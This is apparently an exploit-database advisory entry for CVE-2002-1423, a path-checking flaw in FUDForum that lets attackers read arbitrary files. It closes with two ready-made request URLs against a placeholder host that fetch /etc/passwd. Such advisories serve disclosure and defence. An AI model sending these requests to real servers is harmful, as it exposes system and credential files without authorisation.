Ilia Alshanetsky FUDForum 1.2.8/1.9.8/2.0.2 - File Disclosure
Author: Ulf Harnhammar type: webapps platform: php port: date_added: 2002-08-19 date_updated: 2012-10-04 verified: 1 codes: CVE-2002-1423;OSVDB-11377 tags: aliases: screenshot_url: application_url: raw file: 21723.txt
source: https://www.securityfocus.com/bid/5501/info Reportedly, FUDForum may disclose contents of arbitrary files to attackers. The vulnerability is the result of FUDForum failing to check the path of the file that is being requested. By simply making malicious requests via URI parameters, an attacker is able to obtain access to potentially sensitive files. http://victimhost.com/tmp_view.php?file=/etc/passwd http://victimhost.com/admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]